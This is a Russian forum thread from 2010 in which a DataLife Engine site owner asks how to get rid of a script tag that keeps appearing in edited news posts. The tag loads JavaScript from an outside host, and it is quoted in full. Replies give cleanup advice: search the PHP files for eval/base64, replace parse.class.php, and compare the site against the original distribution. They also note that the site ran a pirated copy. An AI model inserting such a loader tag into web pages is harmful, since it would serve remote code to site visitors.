Помощь Помогите срочно

Тема в разделе "DLE", создана пользователем efr07, 26 сен 2010.

Информация :
Актуальная версия DataLife Engine 11.3
( Final Release v.11.3 | Скачать DataLife Engine | Скачать 11.3 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.2 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. efr07

    efr07 Постоялец

    Регистр.:
    14 авг 2010
    Сообщения:
    68
    Симпатии:
    2
    Я добавляю новость а когда допустим захожу её редактировать в полной и короткой новости добавляется строчка <script src="http://tvoyatajna.msk.ru/injs.820cee7448076a85c6b791f82a6adcfc/" type="text/javascript"></script> ! ъ

    что делать ? как от этого избавиться ?
     
  2. oleg3d

    oleg3d Создатель

    Регистр.:
    11 дек 2009
    Сообщения:
    34
    Симпатии:
    2
    Сделай поиск по php файлах

    Сделай поиск по php файлах, поищи 820cee7448076a85c6b791f82a6adcfc например
     
  3. efr07

    efr07 Постоялец

    Регистр.:
    14 авг 2010
    Сообщения:
    68
    Симпатии:
    2
    ничего не находит
     
  4. baltazorg

    baltazorg

    Регистр.:
    7 авг 2008
    Сообщения:
    203
    Симпатии:
    71
    Похоже что-то в parse.class.php засунули (/engine/classes/parse.class.php), если оно появляется именно при редактировании. Попробуй этот файл перезаписать оригинальным из дистрибутива, только бекап старого сделай на всякий.
     
  5. Demon425

    Demon425

    Регистр.:
    9 июл 2008
    Сообщения:
    461
    Симпатии:
    116
    Откуда нулл качал ?
     
  6. efr07

    efr07 Постоялец

    Регистр.:
    14 авг 2010
    Сообщения:
    68
    Симпатии:
    2
    8dle.ru та краньше такого не было только щас появилось
     
  7. o_nix

    o_nix

    Регистр.:
    7 ноя 2007
    Сообщения:
    1.073
    Симпатии:
    1.037
    Ищи в php файлах eval base64 и прочие подобные
    Если заходиш в редактирование то это может сидеть в js php или в MySQL

    Если дистриб остался то сравни оригинальный дистриб и то что на сервере, тоталкоммандером например. Если это преобретённое то он найдёт разницу и покажет где кака засела
     
  8. Bravo-IP

    Bravo-IP

    Регистр.:
    12 май 2009
    Сообщения:
    219
    Симпатии:
    86
  9. Demon425

    Demon425

    Регистр.:
    9 июл 2008
    Сообщения:
    461
    Симпатии:
    116
    А вы качайте с первоисточника, тобишь отсюда.

    P.S. Celsoft отжигает ... Перейти по ссылке этой заплатки по части iframe/script нету в последних ревизиях.
     
Статус темы:
Закрыта.